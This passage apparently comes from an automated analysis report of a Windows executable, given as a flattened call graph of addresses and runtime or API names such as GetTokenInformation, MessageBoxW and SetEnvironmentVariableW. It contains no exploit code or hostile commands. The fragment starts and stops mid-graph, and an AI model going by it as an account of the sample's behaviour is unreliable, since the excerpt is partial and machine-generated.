7ff7ead14f08 _set_fmode 11 API calls 17258->17259 17258->17265 17261 7ff7ead11669 17259->17261 17262 7ff7ead113ca 17260->17262 17263 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17261->17263 17264 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17262->17264 17263->17265 17264->17258 17265->16938 17267 7ff7ead10704 17266->17267 17294 7ff7ead10464 17267->17294 17269 7ff7ead1071d 17269->16590 17306 7ff7ead103bc 17270->17306 17274 7ff7ead0c850 17273->17274 17275 7ff7ead02930 GetCurrentProcessId 17274->17275 17276 7ff7ead01c80 49 API calls 17275->17276 17277 7ff7ead02979 17276->17277 17320 7ff7ead14984 17277->17320 17282 7ff7ead01c80 49 API calls 17283 7ff7ead029ff 17282->17283 17350 7ff7ead02620 17283->17350 17286 7ff7ead0c550 _log10_special 8 API calls 17287 7ff7ead02a31 17286->17287 17287->16629 17289 7ff7ead10119 17288->17289 17290 7ff7ead01b89 17288->17290 17291 7ff7ead14f08 _set_fmode 11 API calls 17289->17291 17290->16628 17290->16629 17292 7ff7ead1011e 17291->17292 17293 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17292->17293 17293->17290 17295 7ff7ead104ce 17294->17295 17296 7ff7ead1048e 17294->17296 17295->17296 17297 7ff7ead104da 17295->17297 17298 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17296->17298 17305 7ff7ead1546c EnterCriticalSection 17297->17305 17300 7ff7ead104b5 17298->17300 17300->17269 17307 7ff7ead103e6 17306->17307 17308 7ff7ead01a20 17306->17308 17307->17308 17309 7ff7ead10432 17307->17309 17310 7ff7ead103f5 __scrt_get_show_window_mode 17307->17310 17308->16598 17308->16599 17319 7ff7ead1546c EnterCriticalSection 17309->17319 17312 7ff7ead14f08 _set_fmode 11 API calls 17310->17312 17314 7ff7ead1040a 17312->17314 17317 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17314->17317 17317->17308 17322 7ff7ead149de 17320->17322 17321 7ff7ead14a03 17323 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17321->17323 17322->17321 17324 7ff7ead14a3f 17322->17324 17337 7ff7ead14a2d 17323->17337 17359 7ff7ead12c10 
17324->17359 17326 7ff7ead14b1c 17329 7ff7ead1a948 __free_lconv_num 11 API calls 17326->17329 17328 7ff7ead0c550 _log10_special 8 API calls 17330 7ff7ead029c3 17328->17330 17329->17337 17338 7ff7ead15160 17330->17338 17331 7ff7ead14b40 17331->17326 17333 7ff7ead14b4a 17331->17333 17332 7ff7ead14af1 17334 7ff7ead1a948 __free_lconv_num 11 API calls 17332->17334 17336 7ff7ead1a948 __free_lconv_num 11 API calls 17333->17336 17334->17337 17335 7ff7ead14ae8 17335->17326 17335->17332 17336->17337 17337->17328 17339 7ff7ead1b2c8 _set_fmode 11 API calls 17338->17339 17340 7ff7ead15177 17339->17340 17341 7ff7ead1eb98 _set_fmode 11 API calls 17340->17341 17342 7ff7ead151b7 17340->17342 17347 7ff7ead029e5 17340->17347 17343 7ff7ead151ac 17341->17343 17342->17347 17497 7ff7ead1ec20 17342->17497 17344 7ff7ead1a948 __free_lconv_num 11 API calls 17343->17344 17344->17342 17347->17282 17348 7ff7ead1a900 _isindst 17 API calls 17349 7ff7ead151fc 17348->17349 17351 7ff7ead0262f 17350->17351 17352 7ff7ead09390 2 API calls 17351->17352 17353 7ff7ead02660 17352->17353 17354 7ff7ead02683 MessageBoxA 17353->17354 17355 7ff7ead0266f MessageBoxW 17353->17355 17356 7ff7ead02690 17354->17356 17355->17356 17357 7ff7ead0c550 _log10_special 8 API calls 17356->17357 17358 7ff7ead026a0 17357->17358 17358->17286 17360 7ff7ead12c4e 17359->17360 17361 7ff7ead12c3e 17359->17361 17362 7ff7ead12c57 17360->17362 17363 7ff7ead12c85 17360->17363 17364 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17361->17364 17365 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17362->17365 17363->17361 17366 7ff7ead12c7d 17363->17366 17367 7ff7ead147c0 45 API calls 17363->17367 17369 7ff7ead12f34 17363->17369 17373 7ff7ead135a0 17363->17373 17399 7ff7ead13268 17363->17399 17429 7ff7ead12af0 17363->17429 17364->17366 17365->17366 17366->17326 17366->17331 17366->17332 17366->17335 17367->17363 17371 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17369->17371 17371->17361 17374 7ff7ead135e2 17373->17374 17375 
7ff7ead13655 17373->17375 17376 7ff7ead135e8 17374->17376 17377 7ff7ead1367f 17374->17377 17378 7ff7ead1365a 17375->17378 17379 7ff7ead136af 17375->17379 17385 7ff7ead135ed 17376->17385 17388 7ff7ead136be 17376->17388 17446 7ff7ead11b50 17377->17446 17380 7ff7ead1365c 17378->17380 17381 7ff7ead1368f 17378->17381 17379->17377 17379->17388 17397 7ff7ead13618 17379->17397 17383 7ff7ead135fd 17380->17383 17387 7ff7ead1366b 17380->17387 17453 7ff7ead11740 17381->17453 17396 7ff7ead136ed 17383->17396 17432 7ff7ead13f04 17383->17432 17385->17383 17389 7ff7ead13630 17385->17389 17385->17397 17387->17377 17391 7ff7ead13670 17387->17391 17388->17396 17460 7ff7ead11f60 17388->17460 17389->17396 17442 7ff7ead143c0 17389->17442 17394 7ff7ead14558 37 API calls 17391->17394 17391->17396 17393 7ff7ead0c550 _log10_special 8 API calls 17395 7ff7ead13983 17393->17395 17394->17397 17395->17363 17396->17393 17397->17396 17467 7ff7ead1e858 17397->17467 17400 7ff7ead13289 17399->17400 17401 7ff7ead13273 17399->17401 17404 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17400->17404 17405 7ff7ead132c7 17400->17405 17402 7ff7ead135e2 17401->17402 17403 7ff7ead13655 17401->17403 17401->17405 17406 7ff7ead135e8 17402->17406 17407 7ff7ead1367f 17402->17407 17408 7ff7ead1365a 17403->17408 17409 7ff7ead136af 17403->17409 17404->17405 17405->17363 17416 7ff7ead135ed 17406->17416 17419 7ff7ead136be 17406->17419 17412 7ff7ead11b50 38 API calls 17407->17412 17410 7ff7ead1365c 17408->17410 17411 7ff7ead1368f 17408->17411 17409->17407 17409->17419 17427 7ff7ead13618 17409->17427 17413 7ff7ead135fd 17410->17413 17417 7ff7ead1366b 17410->17417 17414 7ff7ead11740 38 API calls 17411->17414 17412->17427 17415 7ff7ead13f04 47 API calls 17413->17415 17428 7ff7ead136ed 17413->17428 17414->17427 17415->17427 17416->17413 17418 7ff7ead13630 17416->17418 17416->17427 17417->17407 17421 7ff7ead13670 17417->17421 17422 7ff7ead143c0 47 API calls 17418->17422 17418->17428 17420 7ff7ead11f60 38 API calls 
17419->17420 17419->17428 17420->17427 17424 7ff7ead14558 37 API calls 17421->17424 17421->17428 17422->17427 17423 7ff7ead0c550 _log10_special 8 API calls 17425 7ff7ead13983 17423->17425 17424->17427 17425->17363 17426 7ff7ead1e858 47 API calls 17426->17427 17427->17426 17427->17428 17428->17423 17480 7ff7ead10d14 17429->17480 17433 7ff7ead13f26 17432->17433 17434 7ff7ead10b80 12 API calls 17433->17434 17435 7ff7ead13f6e 17434->17435 17436 7ff7ead1e570 46 API calls 17435->17436 17437 7ff7ead14041 17436->17437 17438 7ff7ead147c0 45 API calls 17437->17438 17439 7ff7ead14063 17437->17439 17438->17439 17440 7ff7ead147c0 45 API calls 17439->17440 17441 7ff7ead140ec 17439->17441 17440->17441 17441->17397 17443 7ff7ead143d8 17442->17443 17444 7ff7ead14440 17442->17444 17443->17444 17445 7ff7ead1e858 47 API calls 17443->17445 17444->17397 17445->17444 17447 7ff7ead11b83 17446->17447 17448 7ff7ead11bb2 17447->17448 17450 7ff7ead11c6f 17447->17450 17449 7ff7ead10b80 12 API calls 17448->17449 17452 7ff7ead11bef 17448->17452 17449->17452 17451 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17450->17451 17451->17452 17452->17397 17454 7ff7ead11773 17453->17454 17455 7ff7ead117a2 17454->17455 17458 7ff7ead1185f 17454->17458 17456 7ff7ead117df 17455->17456 17457 7ff7ead10b80 12 API calls 17455->17457 17456->17397 17457->17456 17459 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17458->17459 17459->17456 17461 7ff7ead11f93 17460->17461 17462 7ff7ead11fc2 17461->17462 17464 7ff7ead1207f 17461->17464 17463 7ff7ead10b80 12 API calls 17462->17463 17466 7ff7ead11fff 17462->17466 17463->17466 17465 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17464->17465 17465->17466 17466->17397 17468 7ff7ead1e880 17467->17468 17469 7ff7ead1e8c5 17468->17469 17471 7ff7ead147c0 45 API calls 17468->17471 17473 7ff7ead1e885 __scrt_get_show_window_mode 17468->17473 17476 7ff7ead1e8ae __scrt_get_show_window_mode 17468->17476 17469->17473 17469->17476 17477 7ff7ead207e8 17469->17477 17470 
7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17470->17473 17471->17469 17473->17397 17476->17470 17476->17473 17479 7ff7ead2080c WideCharToMultiByte 17477->17479 17481 7ff7ead10d41 17480->17481 17482 7ff7ead10d53 17480->17482 17483 7ff7ead14f08 _set_fmode 11 API calls 17481->17483 17484 7ff7ead10d9d 17482->17484 17486 7ff7ead10d60 17482->17486 17485 7ff7ead10d46 17483->17485 17489 7ff7ead10e46 17484->17489 17490 7ff7ead14f08 _set_fmode 11 API calls 17484->17490 17487 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17485->17487 17488 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 17486->17488 17494 7ff7ead10d51 17487->17494 17488->17494 17491 7ff7ead14f08 _set_fmode 11 API calls 17489->17491 17489->17494 17492 7ff7ead10e3b 17490->17492 17493 7ff7ead10ef0 17491->17493 17495 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17492->17495 17496 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17493->17496 17494->17363 17495->17489 17496->17494 17501 7ff7ead1ec3d 17497->17501 17498 7ff7ead1ec42 17499 7ff7ead151dd 17498->17499 17500 7ff7ead14f08 _set_fmode 11 API calls 17498->17500 17499->17347 17499->17348 17502 7ff7ead1ec4c 17500->17502 17501->17498 17501->17499 17504 7ff7ead1ec8c 17501->17504 17503 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 17502->17503 17503->17499 17504->17499 17505 7ff7ead14f08 _set_fmode 11 API calls 17504->17505 17505->17502 17507 7ff7ead085b1 GetTokenInformation 17506->17507 17508 7ff7ead08633 __vcrt_freefls 17506->17508 17509 7ff7ead085d2 GetLastError 17507->17509 17512 7ff7ead085dd 17507->17512 17510 7ff7ead0864c 17508->17510 17511 7ff7ead08646 CloseHandle 17508->17511 17509->17508 17509->17512 17510->16647 17511->17510 17512->17508 17513 7ff7ead085f9 GetTokenInformation 17512->17513 17513->17508 17514 7ff7ead0861c 17513->17514 17514->17508 17515 7ff7ead08626 ConvertSidToStringSidW 17514->17515 17515->17508 17517 7ff7ead0c850 17516->17517 17518 7ff7ead02b74 GetCurrentProcessId 17517->17518 17519 7ff7ead026b0 48 API 
calls 17518->17519 17520 7ff7ead02bc7 17519->17520 17521 7ff7ead14bd8 48 API calls 17520->17521 17522 7ff7ead02c10 MessageBoxW 17521->17522 17523 7ff7ead0c550 _log10_special 8 API calls 17522->17523 17524 7ff7ead02c40 17523->17524 17524->16657 17526 7ff7ead025e5 17525->17526 17527 7ff7ead14bd8 48 API calls 17526->17527 17528 7ff7ead02604 17527->17528 17528->16673 17533 7ff7ead081dc 17532->17533 17534 7ff7ead09390 2 API calls 17533->17534 17722 7ff7ead0456a 17721->17722 17723 7ff7ead09390 2 API calls 17722->17723 17724 7ff7ead0458f 17723->17724 17725 7ff7ead0c550 _log10_special 8 API calls 17724->17725 17726 7ff7ead045b7 17725->17726 17726->16710 17729 7ff7ead07e2e 17727->17729 17728 7ff7ead07f52 17731 7ff7ead0c550 _log10_special 8 API calls 17728->17731 17729->17728 17730 7ff7ead01c80 49 API calls 17729->17730 17732 7ff7ead07eb5 17730->17732 17733 7ff7ead07f83 17731->17733 17732->17728 17734 7ff7ead01c80 49 API calls 17732->17734 17735 7ff7ead04560 10 API calls 17732->17735 17736 7ff7ead07f0b 17732->17736 17733->16710 17734->17732 17735->17732 17737 7ff7ead09390 2 API calls 17736->17737 17740 7ff7ead01613 17739->17740 17741 7ff7ead01637 17739->17741 17860 7ff7ead01050 17740->17860 17742 7ff7ead045c0 108 API calls 17741->17742 17745 7ff7ead0164b 17742->17745 17747 7ff7ead01653 17745->17747 17748 7ff7ead01682 17745->17748 17750 7ff7ead14f08 _set_fmode 11 API calls 17747->17750 17751 7ff7ead045c0 108 API calls 17748->17751 17788 7ff7ead07144 17787->17788 17789 7ff7ead0718b 17787->17789 17788->17789 17924 7ff7ead15024 17788->17924 17789->16710 17792 7ff7ead041a1 17791->17792 17793 7ff7ead044e0 49 API calls 17792->17793 17794 7ff7ead041db 17793->17794 17795 7ff7ead044e0 49 API calls 17794->17795 17796 7ff7ead041eb 17795->17796 17797 7ff7ead0420d 17796->17797 17798 7ff7ead0423c 17796->17798 17836 7ff7ead01c80 49 API calls 17835->17836 17837 7ff7ead04474 17836->17837 17837->16710 17861 7ff7ead045c0 108 API calls 17860->17861 17862 7ff7ead0108c 17861->17862 17863 
7ff7ead01094 17862->17863 17864 7ff7ead010a9 17862->17864 17925 7ff7ead1505e 17924->17925 17926 7ff7ead15031 17924->17926 17927 7ff7ead15081 17925->17927 17930 7ff7ead1509d 17925->17930 17928 7ff7ead14f08 _set_fmode 11 API calls 17926->17928 17935 7ff7ead14fe8 17926->17935 17929 7ff7ead14f08 _set_fmode 11 API calls 17927->17929 17931 7ff7ead1503b 17928->17931 17933 7ff7ead14f4c 45 API calls 17930->17933 17935->17788 18005 7ff7ead15ec8 18002->18005 18003 7ff7ead15eee 18004 7ff7ead14f08 _set_fmode 11 API calls 18003->18004 18007 7ff7ead15ef3 18004->18007 18005->18003 18006 7ff7ead15f21 18005->18006 18008 7ff7ead15f27 18006->18008 18009 7ff7ead15f34 18006->18009 18010 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 18007->18010 18011 7ff7ead14f08 _set_fmode 11 API calls 18008->18011 18021 7ff7ead1ac28 18009->18021 18013 7ff7ead04616 18010->18013 18011->18013 18013->16735 18034 7ff7ead202d8 EnterCriticalSection 18021->18034 18395 7ff7ead178f8 18394->18395 18398 7ff7ead173d4 18395->18398 18397 7ff7ead17911 18397->16743 18399 7ff7ead1741e 18398->18399 18400 7ff7ead173ef 18398->18400 18408 7ff7ead1546c EnterCriticalSection 18399->18408 18401 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 18400->18401 18407 7ff7ead1740f 18401->18407 18407->18397 18410 7ff7ead0fe71 18409->18410 18411 7ff7ead0fe43 18409->18411 18418 7ff7ead0fe63 18410->18418 18419 7ff7ead1546c EnterCriticalSection 18410->18419 18412 7ff7ead1a814 _invalid_parameter_noinfo 37 API calls 18411->18412 18412->18418 18418->16749 18421 7ff7ead045c0 108 API calls 18420->18421 18527 7ff7ead06375 18526->18527 18528 7ff7ead01c80 49 API calls 18527->18528 18529 7ff7ead063b1 18528->18529 18530 7ff7ead063dd 18529->18530 18531 7ff7ead063ba 18529->18531 18533 7ff7ead04630 49 API calls 18530->18533 18532 7ff7ead02710 54 API calls 18531->18532 18556 7ff7ead063d3 18532->18556 18816 7ff7ead1b150 __GetCurrentState 45 API calls 18815->18816 18817 7ff7ead1a3e1 18816->18817 18818 7ff7ead1a504 __GetCurrentState 45 API calls 
18817->18818 18819 7ff7ead1a401 18818->18819 19444 7ff7ead208c8 19445 7ff7ead208ec 19444->19445 19448 7ff7ead208fc 19444->19448 19446 7ff7ead14f08 _set_fmode 11 API calls 19445->19446 19469 7ff7ead208f1 19446->19469 19447 7ff7ead20bdc 19449 7ff7ead14f08 _set_fmode 11 API calls 19447->19449 19448->19447 19450 7ff7ead2091e 19448->19450 19451 7ff7ead20be1 19449->19451 19452 7ff7ead2093f 19450->19452 19575 7ff7ead20f84 19450->19575 19453 7ff7ead1a948 __free_lconv_num 11 API calls 19451->19453 19455 7ff7ead209b1 19452->19455 19457 7ff7ead20965 19452->19457 19461 7ff7ead209a5 19452->19461 19453->19469 19459 7ff7ead1eb98 _set_fmode 11 API calls 19455->19459 19474 7ff7ead20974 19455->19474 19456 7ff7ead20a5e 19468 7ff7ead20a7b 19456->19468 19475 7ff7ead20acd 19456->19475 19590 7ff7ead196c0 19457->19590 19462 7ff7ead209c7 19459->19462 19461->19456 19461->19474 19596 7ff7ead2712c 19461->19596 19465 7ff7ead1a948 __free_lconv_num 11 API calls 19462->19465 19464 7ff7ead1a948 __free_lconv_num 11 API calls 19464->19469 19470 7ff7ead209d5 19465->19470 19466 7ff7ead2098d 19466->19461 19473 7ff7ead20f84 45 API calls 19466->19473 19467 7ff7ead2096f 19471 7ff7ead14f08 _set_fmode 11 API calls 19467->19471 19472 7ff7ead1a948 __free_lconv_num 11 API calls 19468->19472 19470->19461 19470->19474 19478 7ff7ead1eb98 _set_fmode 11 API calls 19470->19478 19471->19474 19476 7ff7ead20a84 19472->19476 19473->19461 19474->19464 19475->19474 19477 7ff7ead233dc 40 API calls 19475->19477 19484 7ff7ead20a89 19476->19484 19632 7ff7ead233dc 19476->19632 19479 7ff7ead20b0a 19477->19479 19481 7ff7ead209f7 19478->19481 19482 7ff7ead1a948 __free_lconv_num 11 API calls 19479->19482 19487 7ff7ead1a948 __free_lconv_num 11 API calls 19481->19487 19483 7ff7ead20b14 19482->19483 19483->19474 19483->19484 19485 7ff7ead20bd0 19484->19485 19490 7ff7ead1eb98 _set_fmode 11 API calls 19484->19490 19489 7ff7ead1a948 __free_lconv_num 11 API calls 19485->19489 19486 7ff7ead20ab5 19488 7ff7ead1a948 __free_lconv_num 11 API 
calls 19486->19488 19487->19461 19488->19484 19489->19469 19491 7ff7ead20b58 19490->19491 19492 7ff7ead20b69 19491->19492 19493 7ff7ead20b60 19491->19493 19495 7ff7ead1a4a4 __std_exception_copy 37 API calls 19492->19495 19494 7ff7ead1a948 __free_lconv_num 11 API calls 19493->19494 19496 7ff7ead20b67 19494->19496 19497 7ff7ead20b78 19495->19497 19502 7ff7ead1a948 __free_lconv_num 11 API calls 19496->19502 19498 7ff7ead20c0b 19497->19498 19499 7ff7ead20b80 19497->19499 19501 7ff7ead1a900 _isindst 17 API calls 19498->19501 19641 7ff7ead27244 19499->19641 19504 7ff7ead20c1f 19501->19504 19502->19469 19507 7ff7ead20c48 19504->19507 19515 7ff7ead20c58 19504->19515 19505 7ff7ead20bc8 19510 7ff7ead1a948 __free_lconv_num 11 API calls 19505->19510 19506 7ff7ead20ba7 19508 7ff7ead14f08 _set_fmode 11 API calls 19506->19508 19509 7ff7ead14f08 _set_fmode 11 API calls 19507->19509 19511 7ff7ead20bac 19508->19511 19512 7ff7ead20c4d 19509->19512 19510->19485 19513 7ff7ead1a948 __free_lconv_num 11 API calls 19511->19513 19513->19496 19514 7ff7ead20f3b 19516 7ff7ead14f08 _set_fmode 11 API calls 19514->19516 19515->19514 19517 7ff7ead20c7a 19515->19517 19519 7ff7ead20f40 19516->19519 19518 7ff7ead20c97 19517->19518 19660 7ff7ead2106c 19517->19660 19522 7ff7ead20d0b 19518->19522 19524 7ff7ead20cbf 19518->19524 19531 7ff7ead20cff 19518->19531 19521 7ff7ead1a948 __free_lconv_num 11 API calls 19519->19521 19521->19512 19527 7ff7ead1eb98 _set_fmode 11 API calls 19522->19527 19540 7ff7ead20cce 19522->19540 19545 7ff7ead20d33 19522->19545 19523 7ff7ead20dbe 19536 7ff7ead20ddb 19523->19536 19539 7ff7ead20e2e 19523->19539 19675 7ff7ead196fc 19524->19675 19532 7ff7ead20d25 19527->19532 19529 7ff7ead1eb98 _set_fmode 11 API calls 19535 7ff7ead20d55 19529->19535 19530 7ff7ead1a948 __free_lconv_num 11 API calls 19530->19512 19531->19523 19531->19540 19681 7ff7ead26fec 19531->19681 19537 7ff7ead1a948 __free_lconv_num 11 API calls 19532->19537 19533 7ff7ead20ce7 19533->19531 19544 7ff7ead2106c 45 API 
calls 19533->19544 19534 7ff7ead20cc9 19538 7ff7ead14f08 _set_fmode 11 API calls 19534->19538 19541 7ff7ead1a948 __free_lconv_num 11 API calls 19535->19541 19542 7ff7ead1a948 __free_lconv_num 11 API calls 19536->19542 19537->19545 19538->19540 19539->19540 19546 7ff7ead233dc 40 API calls 19539->19546 19540->19530 19541->19531 19543 7ff7ead20de4 19542->19543 19549 7ff7ead233dc 40 API calls 19543->19549 19551 7ff7ead20dea 19543->19551 19544->19531 19545->19529 19545->19531 19545->19540 19547 7ff7ead20e6c 19546->19547 19548 7ff7ead1a948 __free_lconv_num 11 API calls 19547->19548 19550 7ff7ead20e76 19548->19550 19553 7ff7ead20e16 19549->19553 19550->19540 19550->19551 19552 7ff7ead20f2f 19551->19552 19556 7ff7ead1eb98 _set_fmode 11 API calls 19551->19556 19555 7ff7ead1a948 __free_lconv_num 11 API calls 19552->19555 19554 7ff7ead1a948 __free_lconv_num 11 API calls 19553->19554 19554->19551 19555->19512 19557 7ff7ead20ebb 19556->19557 19558 7ff7ead20ecc 19557->19558 19559 7ff7ead20ec3 19557->19559 19561 7ff7ead20474 37 API calls 19558->19561 19560 7ff7ead1a948 __free_lconv_num 11 API calls 19559->19560 19563 7ff7ead20eca 19560->19563 19562 7ff7ead20eda 19561->19562 19564 7ff7ead20f6f 19562->19564 19565 7ff7ead20ee2 SetEnvironmentVariableW 19562->19565 19569 7ff7ead1a948 __free_lconv_num 11 API calls 19563->19569 19568 7ff7ead1a900 _isindst 17 API calls 19564->19568 19566 7ff7ead20f27 19565->19566 19567 7ff7ead20f06 19565->19567 19572 7ff7ead1a948 __free_lconv_num 11 API calls 19566->19572 19570 7ff7ead14f08 _set_fmode 11 API calls 19567->19570 19571 7ff7ead20f83 19568->19571 19569->19512 19573 7ff7ead20f0b 19570->19573 19572->19552 19574 7ff7ead1a948 __free_lconv_num 11 API calls 19573->19574 19574->19563 19576 7ff7ead20fb9 19575->19576 19583 7ff7ead20fa1 19575->19583 19577 7ff7ead1eb98 _set_fmode 11 API calls 19576->19577 19585 7ff7ead20fdd 19577->19585 19578 7ff7ead21062 19579 7ff7ead1a504 __GetCurrentState 45 API calls 19578->19579 19581 7ff7ead21068 19579->19581 
19580 7ff7ead2103e 19582 7ff7ead1a948 __free_lconv_num 11 API calls 19580->19582 19582->19583 19583->19452 19584 7ff7ead1eb98 _set_fmode 11 API calls 19584->19585 19585->19578 19585->19580 19585->19584 19586 7ff7ead1a948 __free_lconv_num 11 API calls 19585->19586 19587 7ff7ead1a4a4 __std_exception_copy 37 API calls 19585->19587 19588 7ff7ead2104d 19585->19588 19586->19585 19587->19585 19589 7ff7ead1a900 _isindst 17 API calls 19588->19589 19589->19578 19591 7ff7ead196d0 19590->19591 19592 7ff7ead196d9 19590->19592 19591->19592 19705 7ff7ead19198 19591->19705 19592->19466 19592->19467 19597 7ff7ead27139 19596->19597 19598 7ff7ead26254 19596->19598 19600 7ff7ead14f4c 45 API calls 19597->19600 19599 7ff7ead26261 19598->19599 19607 7ff7ead26297 19598->19607 19602 7ff7ead14f08 _set_fmode 11 API calls 19599->19602 19616 7ff7ead26208 19599->19616 19601 7ff7ead2716d 19600->19601 19604 7ff7ead27172 19601->19604 19608 7ff7ead27183 19601->19608 19612 7ff7ead2719a 19601->19612 19605 7ff7ead2626b 19602->19605 19603 7ff7ead262c1 19606 7ff7ead14f08 _set_fmode 11 API calls 19603->19606 19604->19461 19609 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19605->19609 19610 7ff7ead262c6 19606->19610 19607->19603 19611 7ff7ead262e6 19607->19611 19613 7ff7ead14f08 _set_fmode 11 API calls 19608->19613 19614 7ff7ead26276 19609->19614 19615 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19610->19615 19617 7ff7ead14f4c 45 API calls 19611->19617 19623 7ff7ead262d1 19611->19623 19619 7ff7ead271a4 19612->19619 19620 7ff7ead271b6 19612->19620 19618 7ff7ead27188 19613->19618 19614->19461 19615->19623 19616->19461 19617->19623 19624 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19618->19624 19625 7ff7ead14f08 _set_fmode 11 API calls 19619->19625 19621 7ff7ead271c7 19620->19621 19622 7ff7ead271de 19620->19622 19928 7ff7ead262a4 19621->19928 19937 7ff7ead28f4c 19622->19937 19623->19461 19624->19604 19628 7ff7ead271a9 19625->19628 19630 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API 
calls 19628->19630 19630->19604 19631 7ff7ead14f08 _set_fmode 11 API calls 19631->19604 19633 7ff7ead2341b 19632->19633 19634 7ff7ead233fe 19632->19634 19638 7ff7ead23425 19633->19638 19977 7ff7ead27c38 19633->19977 19634->19633 19635 7ff7ead2340c 19634->19635 19636 7ff7ead14f08 _set_fmode 11 API calls 19635->19636 19640 7ff7ead23411 __scrt_get_show_window_mode 19636->19640 19984 7ff7ead27c74 19638->19984 19640->19486 19642 7ff7ead14f4c 45 API calls 19641->19642 19643 7ff7ead272aa 19642->19643 19645 7ff7ead272b8 19643->19645 19996 7ff7ead1ef24 19643->19996 19999 7ff7ead154ac 19645->19999 19648 7ff7ead273a4 19651 7ff7ead273b5 19648->19651 19652 7ff7ead1a948 __free_lconv_num 11 API calls 19648->19652 19649 7ff7ead14f4c 45 API calls 19650 7ff7ead27327 19649->19650 19654 7ff7ead1ef24 5 API calls 19650->19654 19659 7ff7ead27330 19650->19659 19653 7ff7ead20ba3 19651->19653 19655 7ff7ead1a948 __free_lconv_num 11 API calls 19651->19655 19652->19651 19653->19505 19653->19506 19654->19659 19655->19653 19656 7ff7ead154ac 14 API calls 19657 7ff7ead2738b 19656->19657 19657->19648 19658 7ff7ead27393 SetEnvironmentVariableW 19657->19658 19658->19648 19659->19656 19661 7ff7ead210ac 19660->19661 19668 7ff7ead2108f 19660->19668 19662 7ff7ead1eb98 _set_fmode 11 API calls 19661->19662 19671 7ff7ead210d0 19662->19671 19663 7ff7ead21154 19665 7ff7ead1a504 __GetCurrentState 45 API calls 19663->19665 19664 7ff7ead21131 19667 7ff7ead1a948 __free_lconv_num 11 API calls 19664->19667 19666 7ff7ead2115a 19665->19666 19667->19668 19668->19518 19669 7ff7ead1eb98 _set_fmode 11 API calls 19669->19671 19670 7ff7ead1a948 __free_lconv_num 11 API calls 19670->19671 19671->19663 19671->19664 19671->19669 19671->19670 19672 7ff7ead20474 37 API calls 19671->19672 19673 7ff7ead21140 19671->19673 19672->19671 19674 7ff7ead1a900 _isindst 17 API calls 19673->19674 19674->19663 19676 7ff7ead1970c 19675->19676 19677 7ff7ead19715 19675->19677 19676->19677 20021 7ff7ead1920c 19676->20021 19677->19533 
19677->19534 19682 7ff7ead26ff9 19681->19682 19686 7ff7ead27026 19681->19686 19683 7ff7ead26ffe 19682->19683 19682->19686 19684 7ff7ead14f08 _set_fmode 11 API calls 19683->19684 19687 7ff7ead27003 19684->19687 19685 7ff7ead2706a 19688 7ff7ead14f08 _set_fmode 11 API calls 19685->19688 19686->19685 19689 7ff7ead27089 19686->19689 19702 7ff7ead2705e __crtLCMapStringW 19686->19702 19690 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19687->19690 19691 7ff7ead2706f 19688->19691 19692 7ff7ead27093 19689->19692 19693 7ff7ead270a5 19689->19693 19694 7ff7ead2700e 19690->19694 19695 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19691->19695 19696 7ff7ead14f08 _set_fmode 11 API calls 19692->19696 19697 7ff7ead14f4c 45 API calls 19693->19697 19694->19531 19695->19702 19699 7ff7ead27098 19696->19699 19698 7ff7ead270b2 19697->19698 19698->19702 20068 7ff7ead28b08 19698->20068 19700 7ff7ead1a8e0 _invalid_parameter_noinfo 37 API calls 19699->19700 19700->19702 19702->19531 19704 7ff7ead14f08 _set_fmode 11 API calls 19704->19702 19706 7ff7ead191b1 19705->19706 19715 7ff7ead191ad 19705->19715 19728 7ff7ead225f0 19706->19728 19711 7ff7ead191cf 19754 7ff7ead1927c 19711->19754 19712 7ff7ead191c3 19713 7ff7ead1a948 __free_lconv_num 11 API calls 19712->19713 19713->19715 19715->19592 19720 7ff7ead194ec 19715->19720 19717 7ff7ead1a948 __free_lconv_num 11 API calls 19718 7ff7ead191f6 19717->19718 19719 7ff7ead1a948 __free_lconv_num 11 API calls 19718->19719 19719->19715 19725 7ff7ead1952e 19720->19725 19726 7ff7ead19515 19720->19726 19721 7ff7ead207e8 WideCharToMultiByte 19721->19725 19722 7ff7ead1eb98 _set_fmode 11 API calls 19722->19725 19723 7ff7ead195be 19724 7ff7ead1a948 __free_lconv_num 11 API calls 19723->19724 19724->19726 19725->19721 19725->19722 19725->19723 19725->19726 19727 7ff7ead1a948 __free_lconv_num 11 API calls 19725->19727 19726->19592 19727->19725 19729 7ff7ead191b6 19728->19729 19730 7ff7ead225fd 19728->19730 19734 7ff7ead2292c GetEnvironmentStringsW 
